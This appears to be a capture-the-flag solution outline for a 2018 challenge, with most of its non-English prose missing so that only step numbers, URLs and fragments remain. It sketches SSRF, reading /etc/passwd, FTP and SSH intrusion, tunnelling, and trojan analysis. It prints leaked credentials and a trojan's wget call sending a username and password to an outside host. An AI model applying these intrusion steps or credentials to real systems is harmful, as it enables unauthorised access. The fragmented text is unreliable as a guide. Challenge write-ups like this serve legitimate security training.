2018
2 31
2018
IP ............................................................ 4
News Blog ..................................................... 6
PCAP .......................................................... 13
rootkit ....................................................... 23
| IP 1. 18.4.2018 20:00 - 0
https://www.r-u-ready.xyz/
2. Brainfuck .
2.1.
2.2. - xor-with-key. 3. XOR HEX Brainfuck 2.1
.
4. Israel-Is-70
String - HEX XOR .
5. IP 35.205.32.11
| News Blog http://35.205.32.11/
1. phishing.
2. 2.1. .
3. 3.1.
http://35.205.32.11/main
3.2. source code
3.3.
http://35.205.32.11/administration
3.4. ,
:
http://35.205.32.11/register
3.5. SSRF.
3.5.1. client ,
web console - :
3.6. /etc/passwd
3.6.1.
3.7. login.php :
3.7.1.
3.7.2. login.php.
3.7.3.
3.8. loopback (127.0.0.1)
3.8.1. console :
3.8.2.
3.9. console :
3.9.1.
http://35.205.32.11/profilePics/administration
3.10. IP anonymous :
http://35.205.32.11/ch1_success
| PCAP
1. phishing
2. 2.1. PCAP
2.2. FTP
2.3.
2.4. storage
3. 3.1. wireshark FTP
35.204.90.89 2121
3.1.1. username : user , password: 12345
3.2. FTP
3.3. pcap FTP
5555 – HASH :
strings :
3.3.1. hash md5 - 37478
3.3.2. 37479 hash sha512 :
3.3.3. 5555:
3.3.4. hash 19922
3.4. FTP 5555 hash
1 hash sha512.
3.4.1. script
3.4.2. script FTP
3.5. FTP 2121 PCAP
3.5.1. Linux
FileZilla
3.6. FTP 4
3.6.1. /usr/backup
id_rsa Hint latest FW - floppyfw.conf.enc
3.6.2. backup cisco - cisco.conf.enc
3.7. hint s3cr3t - RSA
3.8. RSA SSH
shell /bin/false :
3.8.1. SFTP –
3.8.2. conf_enc.pyc -
FTP
3.9. decompile pyc
3.9.1. :
3.10. script
3.10.1. google
https://gist.github.com/swinton/8409454
3.10.2. Decrypt
3.11. FTP
3.11.1. cisco.conf - cisco
3.11.1.1. fwadmin
3.11.1.2. username : fwadmin password:
Sup3rS3cr#tP@ssword
3.11.1.3. router access-list
3.11.1.4. router
10.128.0.3 3389 8080
10.164.0.3 22
3.11.2. floppyfw.conf
3.11.2.1. FW 10.164.0.3 router
SSH
3.11.2.2. FW
3.11.3.
3.11.3.1. storage 10.128.0.3
3.11.3.2. FW
10.164.0.3
3.11.3.3. storage 3389 8080
3.12. 10.164.0.3
ssh tunneling FTP ssh tunnel FW tunnel
10.128.0.3 8080 .
3.12.1. backup SSH
3.12.2.
3.12.3. FW
3.12.4. router - Sup3rS3cr#tP@ssword
3.12.5. 8888
3.13. storage
http://35.205.32.11/ch1_success
3.13.1. stolen_files/ mossad_2018_challenge.solution.doc
3.13.2.
http://localhost:8888/
| rootkit
1.
2. 2.1.
2.2. ISO
2.3. JS
3. 3.1. zip busybox
3.2. file
3.2.1. ELF 64-bit
3.2.2. VM
3.3. /tmp/
3.3.1. tmp
3.3.2. ls busybox
3.3.3.
3.3.3.1.
3.4. tmp
3.4.1. .readme tmp
3.5. suspicious network activity detected 3.5.1. .readme busybox
3.6. ps Process
3.6.1. PID 1337 tmp/Tr0j linux
process
3.6.1.1. admin
3.6.2. /proc/1337 (proc only)
3.6.2.1. busybox
3.6.3. strings
3.6.3.1. wget
http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3
3.6.3.2. ZIP ISO
3.7. mount
3.7.1. ISO
vault (thumbs.db)
3.7.1.1.
3.7.2. file vault SQLite
3.7.3. 4 HTML 3 JS
3.7.3.1. Blowfish-CBC .
3.7.4. JS key
ISO thumb.db
3.7.4.1. thumb.db
3.7.4.2. KEY - *israel70*
3.8. http://sladex.org/blowfish.js/ decrypt 3 JS .
3.8.1. key.js
3.8.2. aes.js
3.8.3. script.js unpack
3.8.4. HTML
3.9. 3 127.0.0.1 (1337)
key 2
3.10. web python.
3.11. HTML
3.12. key - JSONdebug js
3.12.1. base64 decode –
!
3.13.
3.14.
http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4